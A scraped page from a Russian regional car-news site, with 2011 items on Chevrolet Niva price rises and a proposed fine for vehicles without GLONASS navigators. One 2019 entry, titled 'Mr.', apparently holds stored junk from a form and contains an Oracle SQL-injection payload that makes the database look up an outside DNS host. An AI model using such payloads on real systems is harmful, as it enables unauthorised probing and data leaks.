Главная     Мототехника     Автофирмы     Полезное     Автострахование     Доска обьявлений     Реклама     Автотюнинг     Карта сайта    
Предложения
Всего: 9 Посмотреть »

Личный кабинет

Погода

Предложения

Загрузка предложений ...

Партнёры

SolarStyle Studio разработка сайтов, хостинг, домены, дизайн.

Некоторые автоновости
11 января 2011г.
GM-AВТОВАЗ повышает цены и увеличивает гарантийный срок на Chevrolet Niva

GM-АВТОВАЗ с 1 января 2011 года повышает розничные цены на внедорожники Chevrolet Niva на 5 тысяч рублей. Как сообщили в пресс-службе СП, стоимость Chevrolet Niva в комплектации L составит 429 тысячи рублей, LC – 458 тысяч рублей, GLS – 478 тысяч рублей и GLC – 505 тысяч рублей. Повышение цен на автомобили связано с инфляцией, удорожанием комплектующих изделий и увеличением операционных расходов, отмечают на GM-АВТОВАЗ.
Подробнее »
28 апреля 2011г.
Минтранс предложил штрафовать водителей за отсутствие навигаторов ГЛОНАСС

Минтранс подготовил поправки к Кодексу об административных правонарушениях (КоАП), которые вводят с 1 января 2012 года штраф за отсутствие на коммерческом и спецтранспорте навигационной системы ГЛОНАСС. Такое правонарушение обойдется водителям в 2,5 тысячи рублей, а транспортным компаниям - в 30 тысяч рублей, пишет газета "Коммерсантъ".
Подробнее »
30 августа 2019г.
Mr.

1
Подробнее »
'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.529-41409.529.a9e86.1.bxss'||'.me')||'
1

Источник: 1
Реклама










Быстрый поиск

Загрузка поиска ...

Автофирмы Ставрополь

Загрузка автофирм...

Автоновости

Загрузка новостей...

Реклама

    Руководитель сайта: Артёмов Владимир Николаевич Разработка и поддержка сайта - SolarStyle Studio   
Rambler's Top100 Яндекс.Метрика